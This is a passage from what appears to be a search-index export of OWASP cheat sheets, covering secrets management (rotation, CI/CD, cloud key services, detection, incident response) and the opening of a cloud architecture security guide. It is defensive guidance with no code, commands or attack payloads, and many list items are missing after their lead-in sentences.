User credentials are excluded from regular rotating. These should only be rotated if there is suspicion or evidence that they have been compromised, according to NIST recommendations.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#263-revocation","title":"2.6.3 Revocation","text":"

When secrets are no longer required or potentially compromised, you must securely revoke them to restrict access. With (TLS) certificates, this also involves certificate revocation.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#264-expiration","title":"2.6.4 Expiration","text":"

You should create secrets to expire after a defined time where possible. This expiration can either be active expiration by the secret consuming system, or an expiration date set at the secrets management system forcing supporting processes to be triggered, resulting in a secret rotation. You should apply policies through the secrets management solution to ensure credentials are only made available for a limited time appropriate for the type of credentials. Applications should verify that the secret is still active before trusting it.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#27-transport-layer-security-tls-everywhere","title":"2.7 Transport Layer Security (TLS) Everywhere","text":"

Never transmit secrets via plaintext. In this day and age, there is no excuse given the ubiquitous adoption of TLS.

Furthermore, you can effectively use secrets management solutions to provision TLS certificates.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#28-downtime-break-glass-backup-and-restore","title":"2.8 Downtime, Break-glass, Backup and Restore","text":"

Consider the possibility that a secrets management service becomes unavailable for various reasons, such as scheduled downtime for maintenance. It could be impossible to retrieve the credentials required to restore the service if you did not previously acquire them. Thus, choose maintenance windows carefully based on earlier metrics and audit logs.

Next, the backup and restore procedures of the system should be regularly tested and audited for their security. A few requirements regarding backup & restore. Ensure that:

Lastly, you should implement emergency (\"break-glass\") processes to restore the service if the system becomes unavailable for reasons other than regular maintenance. Therefore, emergency break-glass credentials should be regularly backed up securely in a secondary secrets management system and tested routinely to verify they work.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#29-policies","title":"2.9 Policies","text":"

Consistently enforce policies defining the minimum complexity requirements of passwords and approved encryption algorithms at an organization-wide level. Using a centralized secrets management solution can help companies implement these policies.

Next, having an organization-wide secrets management policy can help enforce applying the best practices defined in this cheat sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#210-metadata-prepare-to-move-the-secret","title":"2.10 Metadata: prepare to move the secret","text":"

A secret management solution should provide the capability to store at least the following metadata about a secret:

Note: if you don't store metadata about the secret nor prepare to move, you will increase the probability of vendor lock-in.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#3-continuous-integration-ci-and-continuous-deployment-cd","title":"3 Continuous Integration (CI) and Continuous Deployment (CD)","text":"

Building, testing and deploying changes generally requires access to many systems. Continuous Integration (CI) and Continuous Deployment (CD) tools typically store secrets to provide configuration to the application or during deployment. Alternatively, they interact heavily with the secrets management system. Various best practices can help smooth out secret management in CI/CD; we will deal with some of them in this section.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#31-hardening-your-cicd-pipeline","title":"3.1 Hardening your CI/CD pipeline","text":"

CI/CD tooling consumes (high-privilege) credentials regularly. Ensure that the pipeline cannot be easily hacked or misused by employees. Here are a few guidelines which can help you:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#32-where-should-a-secret-be","title":"3.2 Where should a secret be?","text":"

There are various places where you can store a secret to execute CI/CD actions:

Another alternative here is using the CI/CD pipeline to leverage the Encryption as a Service from the secrets management systems to do the encryption of a secret. The CI/CD tooling can then commit the encrypted secret to git, which can be fetched by the consuming service on deployment and decrypted again. See section 3.6 for more details.

Note: not all secrets must be at the CI/CD pipeline to get to the actual deployment. Instead, make sure that the deployed services take care of part of their secrets management at their own lifecycle (E.g. deployment, runtime and destruction).

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#321-as-part-of-your-cicd-tooling","title":"3.2.1 As part of your CI/CD tooling","text":"

When secrets are part of your CI/CD tooling, it means that these secrets are exposed to your CI/CD jobs. CI/CD tooling can comprise, e.g. GitHub secrets, GitLab repository secrets, ENV Vars/Var Groups in Microsoft Azure DevOps, Kubernetes Secrets, etc. These secrets are often configurable/viewable by people who have the authorization to do so (e.g. a maintainer in GitHub, a project owner in GitLab, an admin in Jenkins, etc.), which together lines up for the following best practices:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#322-storing-it-in-a-secrets-management-system","title":"3.2.2 Storing it in a secrets management system","text":"

Naturally, you can store secrets in a designated secrets management solution. For example, you can use a solution offered by your (cloud) infrastructure provider, such as AWS Secrets Manager, Google Secrets Manager, or Azure KeyVault. You can find more information about these in section 4 of this cheat sheet. Another option is a dedicated secrets management system, such as Hashicorp Vault, Keeper, Confidant, Conjur. Here are a few do's and don'ts for the CI/CD interaction with these systems. Make sure that the following is taken care of:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#323-not-touched-by-cicd-at-all","title":"3.2.3 Not touched by CI/CD at all","text":"

Secrets do not necessarily need to be brought to a consumer of the secret by a CI/CD pipeline. It is even better when the consumer of the secret retrieves the secret. In that case, the CI/CD pipeline still needs to instruct the orchestrating system (e.g. Kubernetes) that it needs to schedule a specific service with a given service account with which the consumer can then retrieve the required secret. The CI/CD tooling then still has credentials for the orchestrating platform but no longer has access to the secrets themselves. The do's and don'ts regarding these credentials types are similar to those described in section 3.2.2.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#33-authentication-and-authorization-of-cicd-tooling","title":"3.3 Authentication and Authorization of CI/CD tooling","text":"

CI/CD tooling should have designated service accounts, which can only operate in the scope of the required secrets or orchestration of the consumers of a secret. Additionally, a CI/CD pipeline run should be easily attributable to the one who has defined the job or triggered it to detect who has tried to exfiltrate secrets or manipulate them. When you use certificate-based auth, the caller of the pipeline identity should be part of the certificate. If you use a token to authenticate towards the mentioned systems, make sure you set the principal requesting these actions (e.g. the user or the job creator).

Verify on a periodical basis whether this is (still) the case for your system so that you can do logging, attribution, and security alerting on suspicious actions effectively.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#34-logging-and-accounting","title":"3.4 Logging and Accounting","text":"

Attackers can use CI/CD tooling to extract secrets. They could, for example, use administrative interfaces or job creation which exfiltrates the secret using encryption or double base64 encoding. Therefore, you should log every action in a CI/CD tool. You should define security alerting rules at every non-standard manipulation of the pipeline tool and its administrative interface to monitor secret usage. Logs should be queryable for at least 90 days and stored for a more extended period in cold storage. It might take security teams time to understand how attackers can exfiltrate or manipulate a secret using CI/CD tooling.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#35-rotation-vs-dynamic-creation","title":"3.5 Rotation vs Dynamic Creation","text":"

You can leverage CI/CD tooling to rotate secrets or instruct other components to do the rotation of the secret. For instance, the CI/CD tool can request a secrets management system or another application to rotate the secret. Alternatively, the CI/CD tool or another component could set up a dynamic secret: a secret required for a consumer to use for as long as it lives. The secret is invalidated when the consumer no longer lives. This procedure reduces possible leakage of a secret and allows for easy detection of misuse. If an attacker uses secret from anywhere other than the consumer's IP, you can easily detect it.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#36-pipeline-created-secrets","title":"3.6 Pipeline Created Secrets","text":"

You can use pipeline tooling to generate secrets and either offer them directly to the service deployed by the tooling or provide the secret to a secrets management solution. Alternatively, the secret can be stored encrypted in git so that the secret and its metadata is as close to the developer's daily place of work as possible. A git-stored secret does require that developers cannot decrypt the secrets themselves and that every consumer of a secret has its encrypted variant of the secret. For instance: the secret should then be different per DTAP environment and be encrypted with another key. For each environment, only the designated consumer in that environment should be able to decrypt the specific secret. A secret does not leak cross-environment and can still be easily stored next to the code. Consumers of a secret could now decrypt the secret using a sidecar, as described in section 5.2. Instead of retrieving the secrets, the consumer would leverage the sidecar to decrypt the secret.

When a pipeline creates a secret by itself, ensure that the scripts or binaries involved adhere to best practices for secret generation. Best practices include secure-randomness, proper length of secret creation, etc. and that the secret is created based on well-defined metadata stored somewhere in git or somewhere else.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4-cloud-providers","title":"4 Cloud Providers","text":"

For cloud providers, there are at least four essential topics to touch upon:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#41-services-to-use","title":"4.1 Services to Use","text":"

It is best to use a designated secret management solution in any environment. Most cloud providers have at least one service that offers secret management. Of course, it's also possible to run a different secret management solution (e.g. HashiCorp Vault or Conjur) on compute resources within the cloud. We'll consider cloud provider service offerings in this section.

Sometimes it's possible to automatically rotate your secret, either via a service provided by your cloud provider or a (custom-built) function. Generally, you should prefer the cloud provider's solution since the barrier of entry and risk of misconfiguration are lower. If you use a custom solution, ensure the function's role to do its rotation can only be assumed by said function.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#411-aws","title":"4.1.1 AWS","text":"

For AWS, the recommended solution is AWS secret manager.

Permissions are granted at the secret level. Check out the Secrets Manager best practices.

It is also possible to use the Systems Manager Parameter store, which is cheaper, but that has a few downsides:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4111-aws-nitro-enclaves","title":"4.1.1.1 AWS Nitro Enclaves","text":"

With AWS Nitro Enclaves, you can create trusted execution environments. Thus, no human-based access is possible once the application is running. Additionally, enclaves do not have any permanent storage attached to them. Therefore, secrets and other sensitive data stored on the nitro enclaves have an additional layer of security.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4112-aws-cloudhsm","title":"4.1.1.2 AWS CloudHSM","text":"

For secrets being used in highly confidential applications, it may be needed to have more control over the encryption and storage of these keys. AWS offers CloudHSM, which lets you bring your own key (BYOK) for AWS services. Thus, you will have more control over keys' creation, lifecycle, and durability. CloudHSM allows automatic scaling and backup of your data. The cloud service provider, Amazon, will not have any access to the key material stored in Azure Dedicated HSM.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#412-gcp","title":"4.1.2 GCP","text":"

For GCP, the recommended service is Secret Manager.

Permissions are granted at the secret level.

Check out the Secret Manager best practices.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4121-google-cloud-confidential-computing","title":"4.1.2.1 Google Cloud Confidential Computing","text":"

GCP Confidential Computing allows encryption of data during runtime. Thus, application code and data are kept secret, encrypted, and cannot be accessed by humans or tools.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#413-azure","title":"4.1.3 Azure","text":"

For Azure, the recommended service is Key Vault.

Contrary to other clouds, permissions are granted at the Key Vault level. This means secrets for separate workloads and separate sensitivity levels should be in separated Key Vaults accordingly.

Check out the Key Vault best practices.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4131-azure-confidential-computing","title":"4.1.3.1 Azure Confidential Computing","text":"

With Azure Confidential Computing, you can create trusted execution environments. Thus, every application will be executed in an encrypted enclave that protects the data and code consumed by the application is protected end-to-end. Furthermore, any application running inside enclaves is not accessible by any tool or human.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#4132-azure-dedicated-hsm","title":"4.1.3.2 Azure Dedicated HSM","text":"

For secrets being used in Azure environments and requiring special security considerations, Azure offers Azure Dedicated HSM. This allows you more control over the secrets stored on it, including enhanced administrative and cryptographic control. The cloud service provider, Microsoft, will not have any access to the key material stored in Azure Dedicated HSM.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#414-other-clouds-multi-cloud-and-cloud-agnostic","title":"4.1.4 Other clouds, Multi-cloud, and Cloud agnostic","text":"

If you're using multiple cloud providers, you should consider using a cloud agnostic secret management solution. This will allow you to use the same secret management solution across all your cloud providers (and possibly also on-premises). Another advantage is that this avoids vendor lock-in with a specific cloud provider, as the solution can be used on any cloud provider.

There are open source and commercial solutions available. Some examples are:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#42-envelope-client-side-encryption","title":"4.2 Envelope & client-side encryption","text":"

This section will describe how a secret is encrypted and how you can manage the keys for that encryption in the cloud.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#421-client-side-encryption-versus-server-side-encryption","title":"4.2.1 Client-side encryption versus server-side encryption","text":"

Server-side encryption of secrets ensures that the cloud provider takes care of the encryption of the secret in storage. The secret is then safeguarded against compromise while at rest. Encryption at rest often does not require additional work other than selecting the key to encrypt it with (See section 4.2.2). However: when you submit the secret to another service, it will no longer be encrypted. It is decrypted before sharing with the intended service or human user.

Client-side encryption of secrets ensures that the secret remains encrypted until you actively decrypt it. This means it is only decrypted when it arrives at the consumer. You need to have a proper crypto system to cater for this. Think about mechanisms such as PGP using a safe configuration and other more scalable and relatively easy to use systems. Client-side encryption can provide an end-to-end encryption of the secret: from producer till consumer.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#422-bring-your-own-key-versus-cloud-provider-key","title":"4.2.2 Bring Your Own Key versus Cloud Provider Key","text":"

When you encrypt a secret at rest, the question is: which key do you want to use? The less trust you have in the cloud provider, the more you will want to manage yourself.

Often, you can either encrypt a secret with a key managed at the secrets management service or use a key management solution from the cloud provider to encrypt the secret. The key offered through the key management solution of the cloud provider can be either managed by the cloud provider or by yourself. Industry standards call the latter \"bring your own key\" (BYOK). You can either directly import or generate this key at the key management solution or using cloud HSM supported by the cloud provider. You can then either use your key or the customer master key from the provider to encrypt the data key of the secrets management solution. The data key, in turn, encrypts the secret. By managing the CMK, you have control over the data key at the secrets management solution.

While importing your own key material can generally be done with all providers (AWS, Azure, GCP), unless you know what you are doing and your threat model and policy require this, this is not a recommended solution due to its complexity and difficulty of use.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#43-identity-and-access-management-iam","title":"4.3 Identity and Access Management (IAM)","text":"

IAM applies to both on-premise and cloud setups: to effectively manage secrets, you need to set up suitable access policies and roles. Setting this up goes beyond policies regarding secrets; it should include hardening the full IAM setup, as it could otherwise allow for privilege escalation attacks. Ensure you never allow open \"pass role\" privileges or unrestricted IAM creation privileges, as these can use or create credentials that have access to the secrets. Next, make sure you tightly control what can impersonate a service account: are your machines' roles accessible by an attacker exploiting your server? Can service roles from the data-pipeline tooling access the secrets easily? Ensure you include IAM for every cloud component in your threat model (e.g. ask yourself: how can you do elevation of privileges with this component?). See this blog entry for multiple do's and don'ts with examples.

Leverage the temporality of the IAM principals effectively: e.g. ensure that only specific roles and service accounts that require it can access the secrets. Monitor these accounts so that you can tell who or what used them to access the secrets.

Next, make sure that you scope access to your secrets: one should not be simply allowed to access all secrets. In GCP and AWS, you can create fine-grained access policies to ensure that a principal cannot access all secrets at once. In Azure, having access to the key vault means having access to all secrets in that key vault. It is, thus, essential to have separate key vaults when working on Azure to segregate access.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#44-api-limits","title":"4.4 API limits","text":"

Cloud services can generally provide a limited amount of API calls over a given period. You could potentially (D)DoS yourself when you run into these limits. Most of these limits apply per account, project, or subscription, so spread workloads to limit your blast radius accordingly. Additionally, some services may support data key caching, preventing load on the key management service API (see for example AWS data key caching). Some services can leverage built-in data key caching. S3 is one such example.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#5-containers-orchestrators","title":"5 Containers & Orchestrators","text":"

You can enrich containers with secrets in multiple ways: build time (not recommended) and during orchestration/deployment.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#51-injection-of-secrets-file-in-memory","title":"5.1 Injection of Secrets (file, in-memory)","text":"

There are three ways to get secrets to an app inside a docker container.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#52-short-lived-side-car-containers","title":"5.2 Short Lived Side-car Containers","text":"

To inject secrets, you could create short-lived sidecar containers that fetch secrets from some remote endpoint and then store them on a shared volume mounted to the original container. The original container can now use the secrets from mounted volume. The benefit of using this approach is that we don't need to integrate any third-party tool or code to get secrets. Once the sidecar has fetched the secrets, it terminates. Examples of this inclue Vault Agent Sidecar Injector and Conjur Secrets Provider. By mounting secrets to a volume shared with the pod, containers within the pod can consume secrets without being aware of the secrets manager.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#53-internal-vs-external-access","title":"5.3 Internal vs External Access","text":"

You should only expose secrets to communication mechanisms between the container and the deployment representation (e.g. a Kubernetes Pod). Never expose secrets through external access mechanisms shared among deployments or orchestrators (e.g. a shared volume).

When the orchestrator stores secrets (e.g. Kubernetes Secrets), make sure that the storage backend of the orchestrator is encrypted and you manage the keys well. See the Kubernetes Security Cheat Sheet for more information.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#6-implementation-guidance","title":"6 Implementation Guidance","text":"

In this section, we will discuss implementation. Note that it is always best to refer to the official documentation of the secrets management system of choice for the actual implementation as it will be more up to date than any secondary document such as this cheat sheet.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#61-key-material-management-policies","title":"6.1 Key Material Management Policies","text":"

Key material management is discussed in the Key Management Cheat Sheet

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#62-dynamic-vs-static-use-cases","title":"6.2 Dynamic vs Static Use Cases","text":"

We see the following use cases for dynamic secrets, amongst others:

Note that these dynamic secrets often need to be created with the service we need to connect to. To create these types of dynamic secrets, we usually require long term static secrets to create the dynamic secrets themselves. Other static use cases:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#63-ensure-limitations-are-in-place","title":"6.3 Ensure limitations are in place","text":"

Secrets should never be retrievable by everyone and everything. Always make sure that you put guardrails in place:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#64-security-event-monitoring-is-key","title":"6.4 Security Event Monitoring is Key","text":"

Continually monitor who/what, from which IP, and what methodology accesses the secret. There are various patterns where you need to look out for, such as, but not limited to:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#65-usability","title":"6.5 Usability","text":"

Ensure that your secrets management solution is easy to use, as you do not want people to work around it or use it ineffectively due to complexity. This usability requires:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#7-encryption","title":"7 Encryption","text":"

Secrets Management goes hand in hand with encryption. After all, secrets must be stored encrypted somewhere to protect their confidentiality and integrity.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#71-encryption-types-to-use","title":"7.1 Encryption Types to Use","text":"

You can use various encryption types to secure a secret as long as they provide sufficient security, including adequate resistance against quantum computing-based attacks. Given that this is a moving field, it is best to take a look at sources like keylength.com, which enumerate up to date recommendations on the usage of encryption types and key lengths for existing standards, as well as the NSA's Commercial National Security Algorithm Suite 2.0 which enumerates quantum resistant algorithms.

Please note that in all cases, we need to preferably select an algorithm that provides encryption and confidentiality at the same time, such as AES-256 using GCM (Gallois Counter Mode), or a mixture of ChaCha20 and Poly1305 according to the best practices in the field.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#72-convergent-encryption","title":"7.2 Convergent Encryption","text":"

Convergent Encryption ensures that a given plaintext and its key results in the same ciphertext. This can help detect possible re-use of secrets, resulting in the same ciphertext. The challenge with enabling convergent encryption is that it allows attackers to use the system to generate a set of cryptographic strings that might end up in the same secret, allowing the attacker to derive the plain text secret. Given the algorithm and key, you can mitigate this risk if the convergent crypto system you use has sufficient resource challenges during encryption. Another factor that can help reduce the risk is ensuring that a secret is of adequate length, further hampering the possible guess-iteration time required.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#73-where-to-store-the-encryption-keys","title":"7.3 Where to store the Encryption Keys?","text":"

You should not store keys next to the secrets they encrypt, except if those keys are encrypted themselves (see envelope encryption). Start by consulting the Key Management Cheat Sheet on where and how to store the encryption and possible HMAC keys.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#74-encryption-as-a-service-eaas","title":"7.4 Encryption as a Service (EaaS)","text":"

EaaS is a model in which users subscribe to a cloud-based encryption service without having to install encryption on their own systems. Using EaaS, you can get the following benefits:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#8-detection","title":"8 Detection","text":"

There are many approaches to secrets detection and some very useful open source projects to help with this. The Yelp Detect Secrets project is mature and has signature matching for around 20 secrets. For more information on other tools to help you in the detection space, check out the Secrets Detection topic on GitHub.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#81-general-detection-approaches","title":"8.1 General detection approaches","text":"

Shift-left and DevSecOps principles apply to secrets detection as well. These general approaches below aim to consider secrets earlier and evolve the practice over time.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#82-types-of-secrets-to-be-detected","title":"8.2 Types of secrets to be detected","text":"

Many types of secrets exist, and you should consider signatures for each to ensure accurate detection for all. Among the more common types are:

For more fun learning about secrets and practice rooting them out check out the Wrong Secrets project.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#83-detection-lifecycle","title":"8.3 Detection lifecycle","text":"

Secrets are like any other authorization token. They should:

Create detection rules for each of the stages of the secret lifecycle.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#84-documentation-for-how-to-detect-secrets","title":"8.4 Documentation for how to detect secrets","text":"

Create documentation and update it regularly to inform the developer community on procedures and systems available at your organization and what types of secrets management you expect, how to test for secrets, and what to do in event of detected secrets.

Documentation should:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#9-incident-response","title":"9 Incident Response","text":"

Quick response in the event of a secret exposure is perhaps one of the most critical considerations for secrets management.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#91-documentation","title":"9.1 Documentation","text":"

Incident response in the event of secret exposure should ensure that everyone in the chain of custody is aware and understands how to respond. This includes application creators (every member of a development team), information security, and technology leadership.

Documentation must include:

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#92-remediation","title":"9.2 Remediation","text":"

The primary goal of incident response is rapid response and containment.

Containment should follow these procedures:

  1. Revocation: Keys that were exposed should undergo immediate revocation. The secret must be able to be de-authorized quickly, and systems must be in place to identify the revocation status.
  2. Rotation: A new secret must be able to be quickly created and implemented, preferably via an automated process to ensure repeatability, low rate of implementation error, and least-privilege (not directly human-readable).
  3. Deletion: Secrets revoked/rotated must be removed from the exposed system immediately, including secrets discovered in code or logs. Secrets in code could have commit history for the exposure squashed to before the introduction of the secret, however, this may introduce other problems as it rewrites git history and will break any other links to a given commit. If you decide to do this be aware of the consequences and plan accordingly. Secrets in logs must have a process for removing the secret while maintaining log integrity.
  4. Logging: Incident response teams must have access to information about the lifecycle of a secret to aid in containment and remediation, including:
"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#93-logging","title":"9.3 Logging","text":"

Additional considerations for logging of secrets usage should include:

Consider using a standardized logging format and vocabulary such as the Logging Vocabulary Cheat Sheet to ensure that all necessary information is logged.

"},{"location":"cheatsheets/Secrets_Management_Cheat_Sheet.html#10-related-cheat-sheets-further-reading","title":"10 Related Cheat Sheets & further reading","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html","title":"Cloud Architecture Security Cheat Sheet","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet will discuss common and necessary security patterns to follow when creating and reviewing cloud architectures. Each section will cover a specific security guideline or cloud design decision to consider. This sheet is written for a medium to large scale enterprise system, so additional overhead elements will be discussed, which may be unecessary for smaller organizations.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#risk-analysis-threat-modeling-and-attack-surface-assessments","title":"Risk Analysis, Threat Modeling, and Attack Surface Assessments","text":"

With any application architecture, understanding the risks and threats is extremely important for proper security. No one can spend their entire budget or bandwidth focused on security, so properly allocating security resources is necessary. Therefore, enterprises must perform risk assessments, threat modeling activites, and attack surface assessments to identify the following:

This is all necessary to properly scope the security of an architecture. However, these are subjects that can/should be discussed in greater detail. Use the resources link below to investigate further as part of a healthy secure architecture conversation.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-and-private-components","title":"Public and Private Components","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#secure-object-storage","title":"Secure Object Storage","text":"

Object storage usually has the following options for accessing data:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#iam-access","title":"IAM Access","text":"

This method involves indirect access on tooling such as a managed or self-managed service running on ephemeral or persistent infrastructure. This infrastructure contains a persistent control plane IAM credential, which interacts with the object storage on the user's behalf. The method is best used when the application has other user interfaces or data systems available, when it is important to hide as much of the storage system as possible, or when the information shouldn't/won't be seen by an end user (metadata). It can be used in combination with web authentication and logging to better track and control access to resources. The key security concern for this approach is relying on developed code or policies which could contain weaknesses.

Pros Cons No direct access to data Potential use of broad IAM policy No user visibility to object storage Credential loss gives access to control plane APIs Identifiable and loggable access Credentials could be hardcoded

This approach is acceptable for sensitive user data, but must follow rigorous coding and cloud best practices, in order to properly secure data.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#signed-urls","title":"Signed URLs","text":"

URL Signing for object storage involves using some method or either statically or dynamically generating URLs, which cryptographically guarantee that an entity can access a resource in storage. This is best used when direct access to specific user files is necessary or preferred, as there is no file transfer overhead. It is advisable to only use this method for user data which is not very sensitive. This method can be secure, but has notable cons. Code injection may still be possible if the method of signed URL generation is custom, dynamic and injectable, and anyone can access the resource anonymously, if given the URL. Developers must also consider if and when the signed URL should expire, adding to the complexity of the approach.

Pros Cons Access to only one resource Anonymous Access Minimal user visibility to object storage Anyone can access with URL Efficient file transfer Possibility of injection with custom code"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-object-storage","title":"Public Object Storage","text":"

This is not an advisable method for resource storage and distribution, and should only be used for public, non-sensitive, generic resources. This storage approach will provide threat actors additional reconnaissance into a cloud environment, and any data which is stored in this configuration for any period of time must be considered publicly accessed (leaked to the public).

Pros Cons Efficient access to many resources Anyone can access/No privacy Simple public file share Unauthenticated access to objects Visibility into full file system Accidently leak stored info"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#vpcs-and-subnets","title":"VPCs and Subnets","text":"

Virtual Private Clouds (VPC) and public/private network subnets allow an application and its network to be segmented into distinct chunks, adding layers of security within a cloud system. Unlike other private vs public trade-offs, an application will likely incorporate most or all of these components in a mature architecture. Each is explained below.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#vpcs","title":"VPCs","text":"

VPC's are used to create network boundaries within an application, where-in components can talk to each other, much like a physical network in a data center. The VPC will be made up of some number of subnets, both public and private. VPCs can be used to:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#public-subnets","title":"Public Subnets","text":"

Public subnets house components which will have an internet facing presence. The subnet will contain network routing elements to allow components within the subnet to connect directly to the internet. Some use cases include:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#private-subnets","title":"Private Subnets","text":"

Private subnets house components which should not have direct internet access. The subnet will likely contain network routing to connect it to public subnets, to receive internet traffic in a structured and protected way. Private subnets are great for:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#simple-architecture-example","title":"Simple Architecture Example","text":"

Consider the simple architecture diagram below. A VPC will house all of the components for the application, but elements will be in a specific subnet depending on its role within the system. The normal flow for interacting with this application might look like:

  1. Accessing the application through some sort of internet gateway, API gateway or other internet facing component.
  2. This gateway connects to a load balancer or a web server in a public subnet. Both components provide public facing functions and are secured accordingly.
  3. These components then interact with their appropriate backend counterparts, a database or backend server, contained in a private VPC. This connections are more limited, preventing extraneous access to the possibly \"soft\" backend systems.

Note: This diagram intentionally skips routing and IAM elements for subnet interfacing, for simplicity and to be service provider agnostic.

This architecture prevents less hardened backend components or higher risk services like databases from being exposed to the internet directly. It also provides common, public functionality access to the internet to avoid additional routing overhead. This architecture can be secured more easily by focusing on security at the entry points and separating functionality, putting non-public or sensitive information inside a private subnet where it will be harder to access by external parties.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#trust-boundaries","title":"Trust Boundaries","text":"

Trust boundaries are connections between components within a system where a trust decision has to be made by the components. Another way to phrase it, this boundary is a point where two components with potentially different trust levels meet. These boundaries can range in scale, from the degrees of trust given to users interacting with an application, to trusting or verifying specific claims between code functions or components within a cloud architecture. Generally speaking however, trusting each component to perform its function correctly and securely, suffices. Therefore, trust boundaries likely will occur in the connections between cloud components, and between the application and third party elements, like end users and other vendors.

As an example, consider the architecture below. An API gateway connects to a compute instance (ephemeral or persistent), which then accesses a persistent storage resource. Separately, there exists a server which can verify the authentication, authorization and/or identity of the caller. This is a generic representation of an OAuth, IAM or directory system, which controls access to these resources. Additionally, there exists an Ephemeral IAM server which controls access for the stored resources (using an approach like the [IAM Access][#iam-access] section above). As shown by the dotted lines, trust boundaries exist between each compute component, the API gateway and the auth/identity server, even though many or all of the elements could be in the same application.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#exploring-different-levels-of-trust","title":"Exploring Different Levels of Trust","text":"

Architects have to select a trust configuration between components, using quantative factors like risk score/tolerance, velocity of project, as well as subjective security goals. Each example below details trust boundary relationships to better explain the implications of trusting a certain resource. The threat level of a specific resource as a color from green (safe) to red (dangerous) will outline which resources shouldn't be trusted.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#1-no-trust-example","title":"1. No trust example","text":"

As shown in the diagram below, this example outlines a model where no component trusts any other component, regardless of criticality or threat level. This type of trust configuration would likely be used for incredibly high risk applications, where either very personal data or important business data is contained, or where the application as a whole has an extremely high business criticality.

Notice that both the API gateway and compute components call out to the auth/identity server. This implies that no data passing between these components, even when right next to each other \"inside\" the application, is considered trusted. The compute instance must then assume an ephemeral identity to access the storage, as the compute instance isn't trusted to a specific resource even if the user is trusted to the instance.

Also note the lack of trust between the auth/identity server and ephemeral IAM server and each component. While not displayed in the diagram, this would have additional impacts, like more rigorous checks before authentication, and possibly more overhead dedicated to cryptographic operations.

